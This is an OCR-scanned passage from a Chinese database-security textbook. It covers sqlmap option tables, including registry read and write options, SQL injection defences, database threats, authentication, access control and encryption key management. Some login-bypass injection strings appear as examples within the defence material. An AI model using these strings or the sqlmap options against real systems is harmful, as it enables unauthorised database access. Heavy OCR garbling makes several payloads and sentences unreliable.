--reg-read 读 一 个 Windows 注册 表 键 值 
--reg-add 写 一 个 Windows 注册 表 键 值 数 据 
--reg-del 删除 Windows 注册 表 键 值 
--reg-key—- REGKEY Windows 注册 表 键 
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续 表 
选 项 说 明 
--reg-value= REGVAL Windows 注册 表 键 值 
--reg-data= REGDATA Windows 注册 表 键 值 数 据 
--reg-type= REGTYPE Windows 注册 表 键 值 类 型 


提示 : Windows 注册 表 访 问 中 的 这 些 选 项 可 以 被 用 来 访问 后 端 数 据 库 管理 系统 
Windows 注册 表 。 


表 6-15 SQLmap 命令 选项 : General( 一 般 ) 


xo 项 说 明 
-s SESSIONFILE 从 一 个 (SQLite) 文 件 中 加 载 会 话 
-t TRAFFICFILE 将 所 有 HTTP 流量 记录 到 一 个 文本 文件 中 
--batch 从 不 询问 用 户 输入 ,使 用 默认 配置 
--eta 显示 每 个 输出 的 预计 到 达 时 间 
--flush-session 刷新 当前 目标 的 会 话 文件 
--fresh-queries 忽略 在 会 话 文件 中 存储 的 查询 结果 
--dump-format— DUF 转 储 数据 的 式 (CSV、TML 或 SQLite, 默 认为 CSV) 
--update 更 新 SQLmap 


提示 : General 中 的 这 些 选项 可 以 用 来 设置 一 些 一 般 的 工作 参数 。 
表 6-16 SQLmap 命令 选项 : Miscellaneous( 杂 项 ) 


选 项 说 明 
--beep 发 现 SQL 注入 时 给 出 提醒 
--gpage= GOOGLEPAGE 从 指定 的 页 码 使 用 谷歌 的 dork 结果 
--mobile 通过 HTTP 用 户 代理 标 头 模仿 智能 手机 
--page-rank 显示 Google dork 结果 的 网 页 排名 
--sqlmap-shell 互动 交互 式 SQLmap Shell 提示 符 


6.1.6 如 何 防范 SOL 注入 攻击 


要 防止 ASP 应 用 被 SQL 注入 式 攻 击 , 只 需 在 将 表单 输入 的 内 容 构造 成 SQL 命令 之 
前 ,把 所 有 的 输入 内 容 过 滤 一 遍 即 可 。 过 滤 输 入 内 容 的 方式 如 下 。 

1. 对 于 动态 构造 SQL 查询 的 场合 

(1) 替换 单 引号 。 把 所 有 单独 出 现 的 单 引号 改 成 两 个 单 引号 ,防止 攻击 者 修改 SQL di 
令 的 含义 。 再 来 看 前 面 的 例子 “select * from admin where name= '''or ''1''— ''1'and 
password 一 ' or "1 二 ']1 ”显然 会 得 到 与 “select * from admin where name= "'or '1'— 
']' and password = "or '1'— €” KAKAR. 

(2) 删除 用 户 输入 内 容 中 的 所 有 连 字符 。 防 止 攻击 者 构造 出 诸如 ”select * from 
admin where name= 'ztg'— and password 二 '” 之 类 的 查询 ,因为 这 类 查询 的 后 半 部 分 已 经 
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被 (--) 注 释 掉 ,不 再 有 效 , 攻 击 者 只 要 知道 一 个 合法 的 用 户 登 录 名 称 ,根本 不 需要 知道 用 户 
的 密码 ,就 可 以 顺利 获得 访问 权限 。 

(3) 对 于 用 来 执行 查询 的 数据 库 账 户 , 限 制 其 权限 。 用 不 同 的 账户 执行 查询 、 插 入 、 更 
新 和 删除 操作 ,可 以 防止 原本 用 于 执行 select 命令 的 地 方 却 被 用 于 执行 insert、update 或 
delete 命令 。 

(4) 过 滤 特 殊 字符 。 在 接收 URL 参数 时 可 以 通过 SetRequest 函数 过 滤 特 殊 字符 , 防 
IE SQL 注入 。 

函数 名 : SetRequest(ParaName，RequestType，ParaType) 。 

ParaName: 参数 名 称 ,字符 型 。 

ParaType: 参数 类 型 ,数字 型 (1 表示 是 数字 ; 0 表示 为 字符 ) 。 

RequestType: 请 求 方式 ,数字 型 (0 表示 直接 请 求 ; 1 表示 Request 请 求 ; 2 表示 post 
请 求 ; 3 表示 get 请 求 ; 4 表示 Cookies 请 求 ; 5 表示 Web 请 求 ) 。 

2. 用 存储 过 程 来 执行 所 有 的 查询 

SQL 参数 的 传递 方式 将 防止 攻击 者 利用 单 引号 和 连 字符 实施 攻击 。 此 外 , 它 还 使 得 数 
据 库 权限 可 以 限制 到 只 允许 特定 的 存储 过 程 执行 ,所 有 的 用 户 输入 必须 遵循 被 调用 的 存储 
过 程 的 安全 上 下 文 ,这 样 就 很 难 再 发 生 注 入 式 攻击 了 。 

3. 限制 表单 或 查询 字符 串 输入 的 长 度 

如 果 用 户 的 登录 名 最 多 只 有 15 个 字符 ,那么 不 要 认可 表单 中 输入 的 15 个 以 上 的 字符 ， 
这 将 增加 攻击 者 在 SQL 命令 中 搬入 有 害 代 码 的 难度 。 

4. 检查 用 户 输入 的 合法 性 ,确信 输入 的 内 容 只 包含 合法 的 数据 

数据 检查 应 当 在 客户 端 和 服务 器 端 都 执行 ,之 所 以 要 执行 服务 器 端 验 证 ,是 为 了 弥补 客 
户 端 验证 机 制 脆弱 的 安全 性 。 因 为 在 客户 端 ,攻击 者 完全 有 可 能 获得 网 页 的 源 代码 ,修改 验 
证 合法 性 的 脚本 (或 者 直接 删除 脚本 ) ,然后 将 非法 内 容 通 过 修改 后 的 表单 提交 给 服务 器 。 
因此 ,要 保证 验证 操作 确实 已 经 执行 ,唯一 的 办 法 就 是 在 服务 器 端 也 执行 验证 。 

5. 将 用 户 登 录 名 称 、 密 码 等 数据 加 密 保存 

加 密 用 户 输入 的 数据 ,然后 再 将 它 与 数据 库 中 保存 的 数据 比较 ,这 样 用 户 输入 的 数据 不 
再 对 数据 库 有 任何 特殊 的 意义 ,从 而 也 就 防止 了 攻击 者 注入 SQL 命令 。 

6. 检查 提取 数据 的 查询 所 返回 的 记录 数量 

如 果 程序 只 要 求 返 回 一 条 记录 ,但 实际 返回 的 记录 却 超过 一 条 , 那 就 当 作出 错 处 理 。 另 
外 ,要 遵循 以 下 4 条 基本 规则 。 

CD 在 构造 动态 SQL 语句 时 ,一 定 要 使 用 类 型 安全 的 参数 编码 机 制 。 

(2) 在 部 署 Web 应 用 前 要 做 安全 审 评 。 在 每 次 更 新 时 ,还 要 认真 地 对 所 有 的 编码 做 安 
全 审 评 。 

(3) 不 要 把 敏感 的 数据 以 明文 的 形式 存放 在 数据 库 里 。 

(4) 只 给 访问 数据 库 的 Web 应 用 所 需 的 最 低 权 限 。 
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62 常见 的 数据 库 安全 问题 及 安全 威胁 


数据 库 中 存放 着 重要 的 信息 ,可 能 有 知识 产权 (比如 可 口 可 乐 的 配方 、Microsoft 的 程序 
源 代码 ) ,也 可 能 是 价格 和 交易 数据 或 者 客户 信息 (比如 某 公 司 的 客户 资料 文档 ) 。 数 据 库 中 
的 这 些 数据 作为 商业 信息 或 知识 ,一 旦 遭受 安全 威胁 ,将 带 来 难以 想象 的 严重 后 果 。 绝 大 多 
数 企 业 甚 至 安全 公司 在 规划 企业 安全 时 往往 把 注意 力 集中 于 网 络 和 操作 系统 的 安全 ,而 忽 
视 最 重要 的 数据 库 安全 。 数 据 库 安全 是 一 个 广阔 的 领域 ,从 传统 的 备份 与 恢复 、 认 证 与 访问 
控制 ,到 数据 存储 和 通信 环节 的 加 密 , 它 作为 操作 系统 之 上 的 应 用 平台 ,其 安全 与 网 络 和 主 
机 的 安全 息息相关 。 

1. 常见 的 数据 库 安全 问题 

尽管 数据 库 安全 性 很 重要 ,但 是 多 数 企业 还 是 不 愿意 在 发 生 无 可 挽回 的 事件 前 着 手 考 
虑 和 解决 相关 的 安全 问题 ,下 面 列 出 了 常见 的 数据 库 安 全 问题 。 

CD 脆弱 的 账号 设置 。 在 许多 成 熟 的 操作 系统 环境 中 ,由 于 受 企业 安全 策略 或 政府 规 
定 的 约束 ,数据库 用 户 往往 缺乏 足够 的 安全 设置 。 比 如 ,默认 的 用 户 账 号 和 密码 对 大 家 都 是 
公开 的 , 却 没 被 禁用 或 修改 以 防止 非 授 权 访问 。 用 户 账号 设置 在 缺乏 基于 字典 的 密码 强度 
检查 和 用 户 账号 过 期 控制 的 情况 下 ,只 能 提供 很 有 限 的 安全 功能 。 

(2) 缺乏 角色 分 离 。 传 统 数据 库 管理 并 没有 “安全 管理 员 ”(Security Administrator) 这 
一 角色 ,这 就 迫使 数据 库 管 理 员 (DBA) 既 要 负责 账号 的 维护 管理 ,又 要 专门 对 数据 库 执行 
性 能 和 操作 行为 进行 调试 跟踪 ,从 而 导致 管理 效率 低下 。 

(3) 缺乏 审计 跟踪 。 数 据 库 审 计 经 常 被 DBA 以 提高 性 能 或 节省 磁盘 空间 为 由 忽视 或 
关闭 ,这 大 大 降低 了 管理 分 析 的 可 靠 性 和 效力 。 审 计 跟 踪 对 了 解 哪 些 用 户 行为 导致 某 些 数 
据 的 产生 至 关 重 要 , 它 将 与 数据 直接 相关 的 事件 都 记 和 日志, 因此 ,监视 数据 访问 和 用 户 行 
为 是 最 基本 的 管理 手段 。 

(4) 未 利用 的 数据 库 安 全 特征 。 为 了 实现 个 别 应 用 系统 的 安全 而 忽视 数据 库 安 全 是 很 
常见 的 事情 。 但 是 ,这 些 安全 措施 只 应 用 在 客户 端 软件 的 用 户 上 ,其 他 许多 工具 ,如 
Microsoft Access 和 已 有 的 通过 OBDC 或 专 有 协议 连接 数据 库 的 公用 程序 ,它们 都 绕 过 了 
应 用 层 安 全 。 因 此 ,唯一 可 靠 的 安全 功能 都 应 限定 在 数据 库 系统 内 部 。 

2. 数据 库 的 安全 威胁 

(1) 数据 库 维护 不 当 。 向 数据 库 中 输入 了 错误 或 被 修改 的 数据 ,有 的 敏感 数据 在 输入 
过 程 中 已 经 泄露 了 .已 经 失去 应 有 的 价值 ; 在 数据 库 维护 (添加 、 删 除 、 修 改 ) 和 利用 过 程 中 
可 能 对 数据 的 完整 性 造成 了 破坏 。 

(2) 硬件 故障 。 支 持 数据 库 系统 的 硬件 环境 故障 ,比如 断 电 造成 的 信息 丢失 ; 硬盘 故 
障 致 使 数据 库 中 的 数据 读 不 出 来 ; 环境 灾害 和 人 为 破坏 也 是 对 数据 库 系统 的 威胁 。 

(3) 功能 弱 的 数据 库 。 如 果 数 据 库 系 统 的 安全 保护 功能 很 弱 , 或 者 根本 没有 安全 保护 
机 制 (如 DBASE 类 数据 库 ) .那么 数据 库 的 攻击 者 很 容易 攻破 数据 库 。 

(4) 权限 分 配 混乱 。 数 据 库 管 理 员 专业 知识 不 够 ,不 能 很 好 地 利用 数据 库 的 保护 机 制 
和 安全 策略 ,不 能 合理 地 分 配 用 户 的 权限 ,或 经 车 干 次 改动 后 造成 用 户 权 限 与 用 户 级 别 混乱 
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配合 ,可 能 会 产生 越权 访问 的 情况 。 

(5) 黑客 的 攻击 。 网 络 黑客 或 内 部 恶意 用 户 整 天 琢磨 操作 系统 和 数据 库 系 统 的 漏洞 ， 
对 网 络 与 数据 库 的 攻击 手段 不 断 翻 新 ,千方百计 地 入 侵 系统 ; 相反 ,各 部 门 对 数据 库 的 安全 
防护 经 费 投入 不 足 , 研 究 深度 不 够 ,系统 的 安全 设施 改进 速度 跟 不 上 黑客 对 系统 破解 的 
速度 。 

(6) 病毒 的 威胁 。 计 算 机 病毒 的 威胁 日 益 严重 ,直接 威胁 网 络 数据 库 服 务 器 的 安全 。 


63 数据 库 系统 安全 体系 、 机制 和 需求 


本 节 介 绍 数 据 库 系统 的 安全 体系 、 安 全 机 制 和 安全 需求 。 
6.3.1 数据 库 系统 安全 体系 


数据 库 系 统 的 安全 除 依赖 自身 内 部 的 安全 机 制 外 ,还 与 外 部 网 络 环境 、 应 用 环境 、 从 业 
人 员 素 质 等 因素 息息相关 ,因此 ,从 广义 上 讲 , 数 据 库 系统 的 安全 框架 可 以 分 为 三 个 层次 : 
网 络 系统 层次 .宿主 操 作 系统 层次 和 数据 库 管理 系统 层次 。 这 三 个 层次 构筑 了 数据 库 系 统 
的 安全 体系 ,与 数据 安全 的 关系 是 逐步 紧密 的 ,防范 的 重要 性 也 逐 层 加 强 , 从 外 到 内 、 由 表 及 
里 保证 数据 的 安全 。 

1. 网 络 系统 层次 安全 技术 

随 着 Internet 的 发 展 和 普及 , 越 来 越 多 的 公司 将 其 核心 业务 向 互联 网 转移 ,面向 网 络 用 
户 提供 各 种 信息 服务 。 可 以 说 网 络 系统 是 数据 库 应 用 的 外 部 环境 和 基础 ,数据 库 系统 要 发 
挥 其 强大 作用 离 不 开 网 络 系统 的 支持 ,数据 库 系 统 的 用 户 ( 如 异地 用 户 、 分 布 式 用 户 ) 也 要 通 
过 网 络 才能 访问 数据 库 的 数据 。 数 据 库 的 安全 首先 依赖 于 网 络 系统 ,外 部 入侵 首先 就 是 从 
入 侵 网 络 系统 开始 的 。 

网 络 入 侵 具有 以 下 特点 。 

(1) 没有 地 域 和 时 间 的 限制 ,跨越 国界 的 攻击 就 如 同 在 现场 一 样 方便 。 

(2) 通过 网 络 的 攻击 往往 混杂 在 大 量 正常 的 网 络 活动 之 中 ,隐蔽 性 强 。 

(3) 人 侵 手 段 更 加 隐蔽 和 复杂 。 

网 络 系统 层次 的 安全 防范 技术 大 臻 可 以 分 为 防火 墙 , 人 侵 检测 \ 入 侵 防 御 等 技术 。 

2. 宿主 操作 系统 层次 安全 技术 

由 于 数据 库 系统 在 操作 系统 (OS) 下 都 是 以 文件 的 形式 进行 管理 的 ,所 以 入 侵 者 可 以 直 
接 利 用 操作 系统 的 漏洞 窃取 数据 库 文件 ,或 者 直接 利用 操作 系统 工具 来 伪造 、 自 改 数据 库 文 
件 内 容 。 对 于 这 种 安全 隐患 ,一 般 的 数据 库 用 户 是 很 难 察觉 的 。 

操作 系统 是 大 型 数据 库 系统 的 运行 平台 ,为 数据 库 系 统 提 供 一 定 程度 的 安全 保护 。 目 
前 操作 系统 平台 大 多 数 为 Windows 和 UNIX. 主 要 安全 技术 有 操作 系统 的 安全 策略 、 安 全 
管理 策略 和 数据 安全 等 。 

操作 系统 安全 策略 用 于 配置 本 地 计算 机 的 安全 设置 ,包括 密码 策略 、 账 户 锁 定 策略 、 审 
核 策 略 LIP. 安全 策略 、 用 户 权利 指派 .加密 数 据 的 恢复 代理 以 及 其 他 安全 选项 。 具 体 可 以 体 
现在 用 户 账户 .口令 ,访问 权限 、 审 计 等 方面 。 
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安全 管理 策略 是 指 网 络 管理 员 对 系统 实施 安全 管理 所 采取 的 方法 及 策略 。 针 对 不 同 的 
操作 系统 、 网 络 环境 需要 采取 的 安全 管理 策略 一 般 也 不 尽 相 同 ,其 核心 是 保证 服务 器 的 安全 
和 分 配 好 各 类 用 户 的 权限 。 

数据 安全 主要 体现 在 数据 加 密 技 术 、 数 据 备 份 . 数 据 存储 的 安全 性 、 数 据 传 输 的 安全 性 
等 。 可 以 采用 的 技术 有 很 多 ,比如 Kerberos iA iE, IPSec, SSL, TLS, VPN 等 技术 。 

3. 数据 库 管理 系统 层次 安全 技术 

数据 库 系统 的 安全 性 很 大 程度 上 依赖 于 数据 库 管理 系统 (DBMS)。 如 果 数 据 库 管理 系 
统 的 安全 机 制 非常 强大 ,那么 数据 库 系统 的 安全 性 就 会 很 高 。 目 前 市 场 上 流行 的 是 关系 数 
据 库 管理 系统 (RDBMS) ,其 安全 性 较 弱 ,这 就 导致 了 数据 库 系统 的 安全 性 存在 一 定 的 威胁 。 

数据 库 管理 系统 层次 安全 技术 主要 是 用 来 解决 当前 面 两 个 层次 (网 络 系统 、 宿 主 操作 系 
统 ) 已 经 被 突破 的 情况 下 仍 能 保障 数据 库 中 数据 的 安全 ,这 就 要 求 数据 库 管理 系统 必须 有 一 
套 强 有 力 的 安全 机 制 。 解 决 这 一 问题 的 有 效 方法 之 一 是 数据 库 管 理 系 统 对 数据 库 文件 进行 
加 密 处 理 , 使 得 即使 数据 不 幸 泄露 或 者 丢失 ,也 难以 被 人 破译 和 阅读 。 

可 以 考虑 在 三 个 不 同 层次 实现 对 数据 库 数据 的 加 密 , 这 三 个 层次 分 别 是 操作 系统 (OS) 
JZ DBMS 内 核 层 和 DBMS 外 层 。 

(D OSE 

在 OS 层 无 法 辨认 数据 库 文件 中 的 数据 关系 .从 而 无 法 产生 合理 的 密 钥 , 对 密 钥 合 理 的 
管理 和 使 用 也 很 难 。 所 以 ,对 于 大 型 数据 库 来 说 ,在 OS 层 对 数据 库 文 件 进 行 加 密 很 难 

(2) DBMS 内 核 层 

这 种 加 密 是 指数 据 在 物理 存 取 之 前 完成 加 /解密 工作 。 

优点 : 加 密 功 能 强 , 并 且 加 密 功 能 几乎 不 会 影响 DBMS 的 功能 ,可 以 实现 加 密 功 能 与 
数据 库 管 理 系 统 之 间 的 无 颖 耦合 。 

缺点 : 加 密 运 算 在 服务 器 端 进行 ,加 重 了 服务 器 的 负载 ,而 且 DBMS 和 加 密 器 之 间 的 
接口 需要 DBMS 开发 商 的 支持 。 

(3) DBMS 外 层 

比较 实际 的 做 法 是 将 数据 库 加 密 系统 做 成 DBMS 的 一 个 外 层 工具 ,根据 加 密 要 求 自动 
完成 对 数据 库 数据 的 加 /解密 处 理 。 采 用 这 种 加 密 方式 进行 加 密 , 加 /解密 运算 可 在 客户 端 
进行 。 

优点 : 系统 对 数据 库 的 最 终 用 户 是 完全 透明 的 ,管理 员 可 以 根据 需要 进行 明文 和 密 文 
的 转换 工作 ; 加 密 系 统 完全 独立 于 数据 库 应 用 系统 ,无 须 改 动 数 据 库 应 用 系统 就 能 实现 数 
据 加 密 功 能 ; 加 解密 处 理 在 客户 端 进行 .不 会 影响 数据 库 服务 器 的 效率 。 

缺点 : 加 密 功能 会 受到 一 些 限 制 :与 数据 库 管 理 系统 之 间 的 耦合 性 稍 差 。 


6.3.2 数据 库 系 统 安全 机 制 


20 世纪 80 年 代 , 美 国 国防 部 根据 军用 计算 机 系统 的 安全 需要 ,制定 了 《可 信 计 算 机 系 

统 安全 评估 标准 》(Trusted Computer System Evaluation Criteria, TCSEC) ,以 及 该 标准 的 
可 信 数 据 库 系统 的 解释 (Trusted Database Interpretation. TDI) ,从 而 形成 了 最 早 的 信息 安 
全 及 数据 库 安全 评估 体系 。TCSEC/TDI 将 系统 安全 性 分 为 4 组 7 个 等 级 ,具体 见 4.7.2 
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数据 库 安 全 机 制 是 用 于 实现 数据 库 的 各 种 安全 策略 的 功能 集合 , 正 是 由 这 些 安全 机 制 
来 实现 安全 模型 ,进而 实现 保护 数据 库 系统 安全 的 目标 。 近 年 来 ,对 用 户 标识 与 鉴别 、 存 取 
控制 .数据 库 加 密 及 密 钥 管 理 等 安全 机 制 的 研究 取得 了 不 少 新 的 进展 。 

1. 用 户 标 识 与 鉴别 

用 户 标 识 : 是 指 用 户 向 系统 出 示 自 己 的 身份 证 明 , 最 简单 的 方法 是 输入 用 户 ID 和 密 
码 。 标 识 机 制 用 于 唯一 标志 进入 系统 的 每 个 用 户 的 身份 ,因此 必须 保证 标识 的 唯一 性 。 

用 户 鉴别 : 是 指 系 统 检查 验证 用 户 的 身份 证 明 , 用 于 检验 用 户 身份 的 合法 性 。 

标识 和 鉴别 功能 保证 了 只 有 合法 的 用 户 才 能 存 取 系统 中 的 资源 。 

由 于 数据 库 用 户 的 安全 等 级 不 同 , 因 此 分 配给 他 们 的 权限 也 不 一 样 ,数据 库 系 统 必须 建 
立 严格 的 用 户 认证 机 制 。 身 份 的 标识 和 鉴别 是 DBMS 对 访问 者 授权 的 前 提 , 并 且 通 过 审计 
机 制 使 DBMS 保留 追究 用 户 行为 责任 的 能 力 。 功 能 完善 的 标识 与 鉴别 机 制 也 是 访问 控制 
机 制 有 效 实 施 的 基础 ,特别 是 在 一 个 开放 的 多 用 户 系统 的 网 络 环 境 中 ,识别 与 鉴别 用 户 是 构 
筑 DBMS 安全 防线 的 第 一 个 重要 环节 。 

近年 来 用 户 标识 与 鉴别 技术 的 发 展 非常 迅速 ,一 些 实体 认证 的 新 技术 在 数据 库 系 统 中 
得 到 应 用 。 目 前 ,常用 的 方法 有 通行 字 认 证 .数字 证 书 认证 智能 卡 认 证 和 个 人 特征 识别 等 。 

CD 通行 字 认 证 。 通 行 字 也 称 为 “口令 ”或 “密码 ”, 是 一 种 根据 已 知事 物 验证 身份 的 方 
法 ,也 是 一 种 最 广泛 研究 和 使 用 的 身份 验证 法 。 在 数据 库 系统 中 往往 对 通行 字 采 取 一 些 控 
制 措施 ,常见 的 有 最 小 长 度 限制 次数 限 定 、 选 择 字符 .有效 期 、 双 通行 字 和 封锁 用 户 系统 等 。 
一 般 还 需 考虑 通行 字 的 分 配 和 管理 ,以 及 在 计算 机 中 的 安全 存储 。 通 行 字 多 以 加 密 形式 存 
储 , 这 样 攻 击 者 要 得 到 通行 字 , 必 须要 知道 加 密 算法 和 密 钥 。 有 的 系统 存储 通行 字 的 单 向 
Hash 值 ,攻击 者 即使 得 到 密 文 也 难以 推出 通行 字 的 明文 。 

(2) 数字 证 书 认 证 。 数 字 证 书 是 由 认证 中 心 颁发 并 进行 数字 签名 的 数字 凭证 , 它 实现 
实体 身份 的 鉴别 与 认证 、 信 息 完 整 性 验证 .机密 性 和 不 可 否认 性 等 安全 服务 。 数 字 证 书 可 用 
来 证 明 实 体 所 宣称 的 身份 与 其 持 有 的 公 钥 的 匹配 关系 ,使 得 实体 的 身份 与 证 书 中 的 公 钥 相 
互 绑 定 。 

(3) 智能 卡 认 证 。 智 能 卡 作为 个 人 所 有 物 ,可 以 用 来 验证 个 人 身份 ,典型 智能 卡 主要 由 
微 处 理 器 、 存 储 器 、 输 入 输出 接口 .安全 逻辑 及 运算 处 理 器 等 组 成 。 在 智能 卡 中 引入 了 认证 
的 概念 ,认证 是 智能 卡 和 应 用 终端 之 间 通 过 相应 的 认证 过 程 来 相互 确认 合法 性 。 在 卡 和 接 
口 设 备 之 间 只 有 相互 认证 之 后 才能 进行 数据 的 读 写 操作 ,目的 在 于 防止 伪造 应 用 终端 及 相 
应 的 智能 卡 。 

(4) 个 人 特征 认证 。 根 据 被 授权 用 户 的 个 人 特征 来 进行 确认 是 一 种 可 信和 度 更 高 的 验证 
方法 ,个 人 特征 识别 应 用 了 生物 统计 学 的 研究 成 果 . 即 利用 个 人 具有 唯一 性 的 生理 特征 来 实 
现 。 个 人 特征 一 般 需 要 应 用 多 媒体 数据 存储 技术 来 建立 档案 ,相应 地 需要 基于 多 媒体 数据 
的 压缩 、 存 储 和 检索 等 技术 作为 支撑 。 目 前 已 得 到 应 用 的 个 人 生理 特征 包括 指纹 、 语 音声 纹 
(voice-print) DNA ,视网膜 ,虹膜 、 脸 型 和 手 型 等 。 

2. 存 取 控 制 

存 取 控 制 的 目的 是 确保 用 户 对 数据 库 只 能 进行 经 过 授权 的 有 关 操 作 。 在 存 取 控制 机 制 
中 ,一 般 把 被 访问 的 资源 称 为 “客体 ”, 把 以 用 户 名 义 进 行 资 源 访问 的 进程 .事务 等 实体 称 为 
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“H”. 

传统 的 存 取 控制 机 制 有 两 种 : DAC 和 MAC, 

DAC(Discretionary Access Control ,自主 存 取 控 制 ): 在 DAC 机 制 中 ,用 户 对 不 同 的 数 
据 对 象 有 不 同 的 存 取 权限 ,而 且 还 可 以 将 其 拥有 的 存 取 权限 转 授 给 其 他 用 户 。DAC 访问 控 
制 完 全 基于 访问 者 和 对 象 的 身份 。 

MAC(Mandatory Access Control ,强制 存 取 控 制 ): MAC 机 制 对 于 不 同类 型 的 信息 采 
取 不 同 层次 的 安全 策略 ,对 不 同类 型 的 数据 来 进行 访问 授权 。 在 MAC 机 制 中 , 存 取 权限 不 
可 以 转 授 , 所 有 用 户 必须 遵守 由 数据 库 管 理 员 建立 的 安全 规则 。MAC 比 DAC 机 制 严格 。 

近年 来 ,RBAC(Role-based Access Control, 基 于 角色 的 存 取 控 制 ) 受 到 了 广泛 的 关注 。 
RBAC 在 主体 和 权限 之 间 增 加 了 一 个 中 间 桥 梁 一 一 角色 。 权 限 被 授予 角色 ,而 管理 员 通 过 
指定 用 户 为 特定 角色 来 为 用 户 授权 。 从 而 大 大 简化 了 授权 管理 ,具有 强大 的 可 操作 性 和 可 
管理 性 。 角 色 可 以 根据 组 织 中 的 不 同 工 作 创建 ,然后 根据 用 户 的 责任 和 资格 分 配角 色 , 用 户 
可 以 轻松 地 进行 角色 和 转换。 而 随 着 新 应 用 和 新 系统 的 增加 ,角色 可 以 分 配 更 多 的 权限 ,也 可 
以 根据 需要 撤销 相应 的 权限 。RBAC 属于 策略 中 立 型 的 存 取 控制 模型 , 既 可 以 实现 DAC 
策略 ,又 可 以 实现 MAC 策略 。 可 以 有 效 缓解 传统 安全 管理 处 理 瓶 颈 问题 ,被 认为 是 一 种 普 
遍 适用 的 访问 控制 模型 ,尤其 适用 于 大 型 组 织 的 有 效 的 访问 控制 机 制 。 

3. 数据 库 加 密 

由 于 数据 库 在 操作 系统 中 以 文件 形式 管理 ,所 以 人 侵 者 可 以 直接 利用 操作 系统 的 漏洞 
窃取 数据 库 文件 ,或 者 筑 改 数据 库 文件 内 容 。 另 外 ,数据 库 管 理 员 (DBA) 可 以 任意 访问 所 
有 数据 ,往往 超出 了 其 职责 范围 ,同样 造成 安全 隐患 。 因 此 ,数据 库 的 保密 问题 不 仅 包括 在 
传输 过 程 中 采用 加 密 保 护 和 控制 非法 访问 ,还 包括 对 存储 的 敏感 数据 进行 加 密 保护 ,使 得 即 
使 数据 不 幸 泄露 或 者 丢失 ,也 难以 造成 泄密 。 同 时 ,数据 库 加 密 可 以 由 用 户 用 自己 的 密 钥 加 
密 自己 的 敏感 信息 ,而 不 需要 了 解数 据 内 容 的 数据 库 管 理 员 无 法 进行 正常 解密 ,从 而 可 以 实 
现 个 性 化 的 用 户 隐 私 保护 。 

一 个 好 的 数据 库 加 密 系统 应 该 满足 以 下 几 个 方面 的 要 求 。 

(1) 足够 的 加 密 强 度 ,保证 数据 长 时 间 内 不 被 破译 。 

(2) 加 密 后 的 数据 库存 储量 没有 明显 的 增加 。 

(3) 加 /解密 速度 足够 快 ,影响 数据 操作 响应 时 间 尽 量 短 。 

(4) 加 /解密 对 数据 库 的 合法 用 户 操 作 ( 如 数据 的 添加 、 删 除 、 修 改 等 ) 是 透明 的 。 

(5) 灵活 的 密 钥 管理 机 制 ,加 /解密 密 钥 存 储 安全 ,使 用 方便 可 靠 。 

数据 库 加 密 机 制 从 大 的 方面 可 以 分 为 库 内 加 密 和 库 外 加 密 。 

数据 库 加 密 的 粒度 可 以 有 4 种: 表 、 属 性 .记录 和 数据 元 素 。 不 同 加 密 粒 度 的 特点 不 
同 , 总 的 来 说 ,加 密 粒 度 越 小 , 则 灵活 性 越 好 且 安 全 性 越 高 ,但 实现 技术 也 更 为 复杂 ,对 系统 
的 运行 效率 影响 也 越 大 。 在 目前 条 件 下 .为 了 得 到 较 高 的 安全 性 和 灵活 性 ,采用 最 多 的 加 密 
粒度 是 数据 元 素 。 为 了 使 数据 库 中 的 数据 能 够 充分 而 灵活 地 共享 ,加 密 后 还 应 当 人 允许 用 户 
以 不 同 的 粒度 进行 访问 。 

加 密 算法 是 数据 加 密 的 核心 ,一 个 好 的 加 密 算 法 产生 的 密 文 应 该 频率 平衡 ,随机 无 重 
码 , 周 期 很 长 而 又 不 可 能 产生 重复 现象 。 窃 密 者 很 难 通过 对 密 文 频率 或 者 重 码 等 特征 的 分 
析 获 得 成 功 。 常 用 的 加 密 算法 包括 对 称 密 钥 算法 和 非 对 称 密 钥 算法 。 
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4. 密 钥 管理 

对 数据 库 进 行 加 密 ,一 般 对 不 同 的 加 密 单 元 采用 不 同 的 密 钥 。 以 加 密 粒度 为 数据 元 素 
为 例 ,如 果 不 同 的 数据 元 素 采用 同一 个 密 钥 ,由 于 同一 属性 中 数据 项 的 取 值 在 一 定 范围 之 
内 , 且 往 往 旦 现 一 定 的 概率 分 布 ,因此 攻击 者 可 以 不 用 求 原文 ,而 直接 通过 统计 方法 即 可 得 
到 有 关 的 原文 信息 ,这 就 是 所 谓 的 统计 攻击 。 

大 量 的 密 钥 自然 会 带 来 密 钥 管理 的 问题 。 根 据 加 密 粒 度 的 不 同 , 系 统 所 产生 的 密 钥 数量 
也 不 同 。 越 是 细小 的 加 密 粒 度 ,所 产生 的 密 钥 数量 越 多 , 密 钥 管理 也 就 越 复 杂 。 和 良好 的 密 钥 管 
理 机 制 既 可 以 保证 数据 库 信 息 的 安全 性 ,又 可 以 进行 快速 的 密 钥 交换 ,以 便 进行 数据 解密 。 

对 数据 库 密 钥 的 管理 一 般 有 集中 密 钥 管 理 和 多 级 密 钥 管理 两 种 体制 。 

集中 密 钥 管理 : 是 设立 密 钥 管理 中 心 。 在 建立 数据 库 时 , 密 钥 管 理 中 心 负责 产生 密 钥 
并 对 数据 加 密 ,形成 一 张 密 钥 表 。 当 用 户 访问 数据 库 时 , 密 钥 管理 机 构 核 对 用 户 识别 符 和 用 
户 密 钥 。 通 过 审核 后 ,由 密 钥 管 理 机 构 找到 或 计算 出 相应 的 数据 密 钥 。 这 种 密 钥 管理 方式 
方便 用 户 使 用 和 管理 ,但 由 于 这 些 密 钥 一 般 由 数据 库 管 理 人 员 控 制 ,因而 权限 过 于 集中 。 

多 级 密 钥 管理 : 目前 研究 和 应 用 比较 多 的 是 多 级 密 钥 管理 体制 ,以 加 密 粒 度 为 数据 元 
素 的 三 级 密 钥 管理 体制 为 例 , 整 个 系统 的 密 钥 由 一 个 主 密 钥 、 每 个 表 上 的 表 密 钥 ,以 及 各 个 
数据 元 素 密 钥 组 成 。 表 密 钥 被 主 密 钥 加 密 后 以 密 文 形式 保 存在 数据 字典 中 ,数据 元 素 密 钥 
由 主 密 钥 及 数据 元 素 所 在 行 、 列 通过 某 种 函数 自动 生成 ,一 般 不 需要 保存 。 在 多 级 密 钥 体制 
中 , 主 密 钥 是 加 密 子 系统 的 关键 ,系统 的 安全 性 在 很 大 程度 上 依赖 于 主 密 钥 的 安全 性 。 

数据 库 加 密 技 术 在 保证 安全 性 的 同时 ,也 给 数据 库 系统 的 可 用 性 带 来 一 些 影响 。 比 如 
